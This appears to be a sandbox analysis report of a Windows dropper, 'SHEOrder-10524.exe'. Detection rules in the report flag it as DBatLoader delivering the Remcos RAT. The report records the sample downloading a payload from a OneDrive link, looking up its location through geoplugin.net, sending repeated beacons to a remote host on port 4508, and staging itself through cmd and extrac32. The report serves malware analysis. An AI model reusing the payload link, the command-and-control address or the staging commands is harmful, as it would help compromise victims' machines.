                                                                                                                                                                  Apr 24, 2024 17:04:07.405925035 CEST497344508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:07.405925035 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:07.405944109 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:07.405960083 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:07.405977964 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:07.405994892 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:07.406013012 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:07.406027079 CEST497344508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:07.406027079 CEST497344508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:07.406053066 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:07.406071901 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:07.406071901 CEST497344508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:07.406088114 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:07.406105042 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:07.406111956 CEST497344508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:07.406122923 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:07.406141996 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:07.406157970 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:07.406167984 CEST497344508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:07.406174898 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:07.406188011 CEST497344508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:07.406193018 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:07.406209946 CEST497344508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:07.406239986 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:07.406256914 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:07.406272888 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:07.406281948 CEST497344508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:07.406320095 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:07.406327009 CEST497344508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:07.406337976 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:07.406354904 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:07.406374931 CEST497344508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:07.406375885 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:07.406393051 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:07.406410933 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:07.406426907 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:07.406438112 CEST497344508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:07.406446934 CEST497344508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:07.407084942 CEST497344508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:09.122222900 CEST497344508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:09.447365046 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:09.447514057 CEST497344508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:09.447645903 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:09.447683096 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:09.447746038 CEST497344508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:09.772552013 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:09.772593021 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:09.772624016 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:09.849174976 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:09.849289894 CEST497344508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:10.173542023 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:10.173773050 CEST497344508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:10.498534918 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:15.022291899 CEST49736443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:15.022363901 CEST4434973613.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:15.022437096 CEST49736443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:15.024252892 CEST49736443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:15.024308920 CEST4434973613.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:15.024355888 CEST49736443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:15.039017916 CEST49737443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:15.039053917 CEST4434973713.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:15.039136887 CEST49737443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:15.040508032 CEST49737443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:15.040524960 CEST4434973713.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:15.562517881 CEST4434973713.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:15.562601089 CEST49737443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:15.564014912 CEST49737443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:15.564023972 CEST4434973713.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:15.564807892 CEST4434973713.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:15.616220951 CEST49737443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:15.617784023 CEST49737443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:15.660157919 CEST4434973713.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:16.006272078 CEST4434973713.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:16.006468058 CEST4434973713.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:16.006531954 CEST49737443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:16.006702900 CEST49737443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:16.006719112 CEST4434973713.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:16.006736040 CEST49737443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:16.006741047 CEST4434973713.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:20.747752905 CEST49744443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:20.747785091 CEST4434974413.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:20.747857094 CEST49744443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:20.747982979 CEST49744443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:20.748043060 CEST4434974413.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:20.748121977 CEST49744443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:20.763066053 CEST49745443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:20.763115883 CEST4434974513.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:20.763292074 CEST49745443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:20.764627934 CEST49745443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:20.764647961 CEST4434974513.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:21.314332008 CEST4434974513.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:21.314414024 CEST49745443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:21.319221020 CEST49745443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:21.319230080 CEST4434974513.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:21.320127010 CEST4434974513.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:21.362493038 CEST49745443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:21.379522085 CEST49745443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:21.420149088 CEST4434974513.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:21.718730927 CEST4434974513.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:21.718934059 CEST4434974513.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:21.719012976 CEST49745443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:21.719114065 CEST49745443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:21.719129086 CEST4434974513.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:21.719156981 CEST49745443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:21.719170094 CEST4434974513.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:23.315247059 CEST45084973391.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:23.316771984 CEST497334508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:23.690080881 CEST45084973391.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:53.302440882 CEST45084973391.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:53.303872108 CEST497334508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:53.674015045 CEST45084973391.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:05:23.314677000 CEST45084973391.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:05:23.317087889 CEST497334508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:05:23.688662052 CEST45084973391.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:05:53.314661026 CEST45084973391.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:05:53.317728043 CEST497334508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:05:53.689191103 CEST45084973391.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:05:54.040747881 CEST4973580192.168.2.4178.237.33.50
                                                                                                                                                                  Apr 24, 2024 17:05:54.946738005 CEST4973580192.168.2.4178.237.33.50
                                                                                                                                                                  Apr 24, 2024 17:05:56.540482998 CEST4973580192.168.2.4178.237.33.50
                                                                                                                                                                  Apr 24, 2024 17:05:59.759288073 CEST4973580192.168.2.4178.237.33.50
Apr 24, 2024 17:06:05.931085110 CEST | 49735 | 80 | 192.168.2.4 | 178.237.33.50
Apr 24, 2024 17:06:18.134181976 CEST | 49735 | 80 | 192.168.2.4 | 178.237.33.50
Apr 24, 2024 17:06:23.314218044 CEST | 4508 | 49733 | 91.223.3.151 | 192.168.2.4
Apr 24, 2024 17:06:23.316307068 CEST | 49733 | 4508 | 192.168.2.4 | 91.223.3.151
Apr 24, 2024 17:06:23.688708067 CEST | 4508 | 49733 | 91.223.3.151 | 192.168.2.4
Apr 24, 2024 17:06:42.540375948 CEST | 49735 | 80 | 192.168.2.4 | 178.237.33.50
Apr 24, 2024 17:06:53.326551914 CEST | 4508 | 49733 | 91.223.3.151 | 192.168.2.4
Apr 24, 2024 17:06:53.329448938 CEST | 49733 | 4508 | 192.168.2.4 | 91.223.3.151
Apr 24, 2024 17:06:53.700886011 CEST | 4508 | 49733 | 91.223.3.151 | 192.168.2.4
Apr 24, 2024 17:07:23.330230951 CEST | 4508 | 49733 | 91.223.3.151 | 192.168.2.4
Apr 24, 2024 17:07:23.335624933 CEST | 49733 | 4508 | 192.168.2.4 | 91.223.3.151
Apr 24, 2024 17:07:23.716628075 CEST | 4508 | 49733 | 91.223.3.151 | 192.168.2.4
Apr 24, 2024 17:07:53.342035055 CEST | 4508 | 49733 | 91.223.3.151 | 192.168.2.4
Apr 24, 2024 17:07:53.347176075 CEST | 49733 | 4508 | 192.168.2.4 | 91.223.3.151
Apr 24, 2024 17:07:53.716444969 CEST | 4508 | 49733 | 91.223.3.151 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 24, 2024 17:03:57.649889946 CEST | 63328 | 53 | 192.168.2.4 | 1.1.1.1
Apr 24, 2024 17:03:58.829994917 CEST | 59923 | 53 | 192.168.2.4 | 1.1.1.1
Apr 24, 2024 17:04:04.066037893 CEST | 55829 | 53 | 192.168.2.4 | 1.1.1.1
Apr 24, 2024 17:04:04.221340895 CEST | 53 | 55829 | 1.1.1.1 | 192.168.2.4
Apr 24, 2024 17:04:14.863095999 CEST | 50710 | 53 | 192.168.2.4 | 1.1.1.1
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 24, 2024 17:03:57.649889946 CEST | 192.168.2.4 | 1.1.1.1 | 0x3b1c | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001) | false
Apr 24, 2024 17:03:58.829994917 CEST | 192.168.2.4 | 1.1.1.1 | 0x1a05 | Standard query (0) | bnaqzw.sn.files.1drv.com | A (IP address) | IN (0x0001) | false
Apr 24, 2024 17:04:04.066037893 CEST | 192.168.2.4 | 1.1.1.1 | 0x900e | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Apr 24, 2024 17:04:14.863095999 CEST | 192.168.2.4 | 1.1.1.1 | 0xd078 | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 24, 2024 17:03:57.803962946 CEST | 1.1.1.1 | 192.168.2.4 | 0x3b1c | No error (0) | onedrive.live.com | web.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 24, 2024 17:03:57.803962946 CEST | 1.1.1.1 | 192.168.2.4 | 0x3b1c | No error (0) | web.fe.1drv.com | odc-web-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false
Apr 24, 2024 17:03:57.803962946 CEST | 1.1.1.1 | 192.168.2.4 | 0x3b1c | No error (0) | odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net | dual-spov-0006.spov-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Apr 24, 2024 17:03:57.803962946 CEST | 1.1.1.1 | 192.168.2.4 | 0x3b1c | No error (0) | dual-spov-0006.spov-msedge.net | | 13.107.139.11 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 17:03:57.803962946 CEST | 1.1.1.1 | 192.168.2.4 | 0x3b1c | No error (0) | dual-spov-0006.spov-msedge.net | | 13.107.137.11 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 17:03:59.071022034 CEST | 1.1.1.1 | 192.168.2.4 | 0x1a05 | No error (0) | bnaqzw.sn.files.1drv.com | sn-files.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 24, 2024 17:03:59.071022034 CEST | 1.1.1.1 | 192.168.2.4 | 0x1a05 | No error (0) | sn-files.fe.1drv.com | odc-sn-files-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false
Apr 24, 2024 17:04:04.221340895 CEST | 1.1.1.1 | 192.168.2.4 | 0x900e | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 17:04:15.017118931 CEST | 1.1.1.1 | 192.168.2.4 | 0xd078 | No error (0) | onedrive.live.com | web.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 24, 2024 17:04:15.017118931 CEST | 1.1.1.1 | 192.168.2.4 | 0xd078 | No error (0) | web.fe.1drv.com | odc-web-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false
Apr 24, 2024 17:04:15.017118931 CEST | 1.1.1.1 | 192.168.2.4 | 0xd078 | No error (0) | odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net | dual-spov-0006.spov-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Apr 24, 2024 17:04:15.017118931 CEST | 1.1.1.1 | 192.168.2.4 | 0xd078 | No error (0) | dual-spov-0006.spov-msedge.net | | 13.107.139.11 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 17:04:15.017118931 CEST | 1.1.1.1 | 192.168.2.4 | 0xd078 | No error (0) | dual-spov-0006.spov-msedge.net | | 13.107.137.11 | A (IP address) | IN (0x0001) | false
• onedrive.live.com
• geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49735 | 178.237.33.50 | 80 | 7432 | C:\Users\Public\Libraries\lhgtogaW.pif
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 17:04:04.533046007 CEST | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Apr 24, 2024 17:04:04.840662956 CEST | 1173 | IN | HTTP/1.1 200 OK
date: Wed, 24 Apr 2024 15:04:04 GMT
server: Apache
content-length: 965
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
Data Ascii: { "geoplugin_request":"154.16.105.36", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Las Vegas", "geoplugin_region":"Nevada", "geoplugin_regionCode":"NV", "geoplugin_regionName":"Nevada", "geoplugin_areaCode":"", "geoplugin_dmaCode":"839", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"36.1685", "geoplugin_longitude":"-115.1164", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Los_Angeles", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 13.107.139.11 | 443 | 7276 | C:\Users\user\Desktop\SHEOrder-10524.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-24 15:03:58 UTC | 213 | OUT | GET /download?resid=B24528E77689F9AC%21162&authkey=!APfH4vXvDJEK1Qc HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: onedrive.live.com
2024-04-24 15:03:58 UTC | 1166 | IN | HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: -1
Location: https://bnaqzw.sn.files.1drv.com/y4mUNi1irqpVap8qJ_hkhgVkZ9e6GpCglPli4DYI3goIWfA8FsMCycwJbzbnR6k4jnss0SvX1GHudmpY3b2Ko_5uKuaUUDwo08rh0ZyymFW4tJ0HMl9nYObno2gsci-jbVL746XlPr58cb20XbPOGCtvpI5luDm4gYdw6YL3LA5UhYm-UXcPxnTVn9gUvhp7vL8UIwEI1Eh8N9SMSLuZCAxAw/xcvg?download&psid=1
Set-Cookie: E=P:0kjUxG9k3Ig=:2bAZGFUfJhj2rylipK/SVRMaNu4XYG5pS7pUL3P+rio=:F; domain=.live.com; path=/
Set-Cookie: xid=9fafd168-77c9-4a56-9d63-8ce5b5264b48&&ODSP-ODWEB-ODCF&152; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Apr-2024 13:23:58 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Wed, 01-May-2024 15:03:58 GMT; path=/
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
X-MSNServer: 57d8d6c5b8-jp754
X-ODWebServer: namsouthce375367-odwebpl
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: 3F1A6D1A0396430E919C307AA512FE51 Ref B: BY3EDGE0411 Ref C: 2024-04-24T15:03:58Z
Date: Wed, 24 Apr 2024 15:03:58 GMT
Connection: close
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49737 | 13.107.139.11 | 443 | 7636 | C:\Users\Public\Libraries\Wagotghl.PIF
Timestamp | Bytes transferred | Direction | Data
2024-04-24 15:04:15 UTC | 213 | OUT | GET /download?resid=B24528E77689F9AC%21162&authkey=!APfH4vXvDJEK1Qc HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: onedrive.live.com
2024-04-24 15:04:16 UTC | 1166 | IN | HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: -1
Location: https://bnaqzw.sn.files.1drv.com/y4mFB-7cF0RJhpIN7Sx_6Q1D2DImE5mQPbbhluzK7S-dhQrKxqFk72nhp4k4_SdW3EeQr6Iz1lcIbmV3BYkQFFPfVvKC6HmRG-KKvN8Xlu2IHLi-nq3UHcEHCR3KwZiPB200DcWr4xIyPfez8CddxZYcHrLCksFQLZm5SJ5vHCtWw0QZfrvPZ6bonmYBeZxBq_4iiqITFpRmylsmkHhd7RbDQ/xcvg?download&psid=1
Set-Cookie: E=P:AQMIz29k3Ig=:0hkvQtZguoRCh1oMTDkt+32MLCC+i1Bq/pmXMF27G1U=:F; domain=.live.com; path=/
Set-Cookie: xid=5c99bfc8-b29d-4f0e-9aa2-1667cf47babb&&ODSP-ODWEB-ODCF&152; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Apr-2024 13:24:15 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Wed, 01-May-2024 15:04:15 GMT; path=/
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
X-MSNServer: 57d8d6c5b8-2lbqt
X-ODWebServer: namsouthce375367-odwebpl
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: E5E63D73C7F24929B7A0C692536197A8 Ref B: BY3EDGE0518 Ref C: 2024-04-24T15:04:15Z
Date: Wed, 24 Apr 2024 15:04:15 GMT
Connection: close
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49745 | 13.107.139.11 | 443 | 7916 | C:\Users\Public\Libraries\Wagotghl.PIF
Timestamp | Bytes transferred | Direction | Data
2024-04-24 15:04:21 UTC | 213 | OUT | GET /download?resid=B24528E77689F9AC%21162&authkey=!APfH4vXvDJEK1Qc HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: onedrive.live.com
2024-04-24 15:04:21 UTC | 1166 | IN | HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: -1
Location: https://bnaqzw.sn.files.1drv.com/y4msc3kYI7yGn3gEL_3gJvdpmyEkhOCRDBRFk1eCCUOzN0wBjvROvE3UIu0RkWHiUlu4t3LbUGXPdoCVTrrDjyx798ZxqZZ3LRBtTXmNYels_IwCFqoSqj1G2heKH5qguAlX-Ahwog92AXVXXG0fQTtMvt9bXDMv59GswXOY06vGxR6YGcSpXpbZ3rQSPUn5wYfNv5lhuI_QV20s3PJQIDOwg/xcvg?download&psid=1
Set-Cookie: E=P:kwF20m9k3Ig=:UFFXKO7gZrG0QvRFnpdGY/gkVGoDVahbkK6yQixcl4k=:F; domain=.live.com; path=/
Set-Cookie: xid=d80356eb-4a83-44c4-b190-a2fd7e62f077&&ODSP-ODWEB-ODCF&152; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Apr-2024 13:24:21 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Wed, 01-May-2024 15:04:21 GMT; path=/
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
X-MSNServer: 57d8d6c5b8-wbqlh
X-ODWebServer: namsouthce375367-odwebpl
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: 3A33CBB3AF20497B95CF5394E5FB0E59 Ref B: BY3EDGE0206 Ref C: 2024-04-24T15:04:21Z
Date: Wed, 24 Apr 2024 15:04:21 GMT
Connection: close
Content-Length: 0

Target ID:0
Start time:17:03:56
Start date:24/04/2024
Path:C:\Users\user\Desktop\SHEOrder-10524.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\SHEOrder-10524.exe"
Imagebase:0x400000
File size:1'646'592 bytes
MD5 hash:439F6DB2ADB770A0F825879C91DA9904
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Yara matches:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000003.1717116451.000000007E700000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000003.1717116451.000000007E700000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000003.1717116451.000000007E700000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.1719936963.0000000002315000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1733060343.000000007E790000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1733060343.000000007E790000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1733060343.000000007E790000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.1676709365.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:low
Has exited:true

Target ID:1
Start time:17:04:00
Start date:24/04/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\WagotghlO.bat" "
Imagebase:0x240000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:2
Start time:17:04:00
Start date:24/04/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:3
Start time:17:04:00
Start date:24/04/2024
Path:C:\Windows\SysWOW64\extrac32.exe
Wow64 process (32bit):true
Commandline:C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\SHEOrder-10524.exe C:\\Users\\Public\\Libraries\\Wagotghl.PIF
Imagebase:0xc0000
File size:29'184 bytes
MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

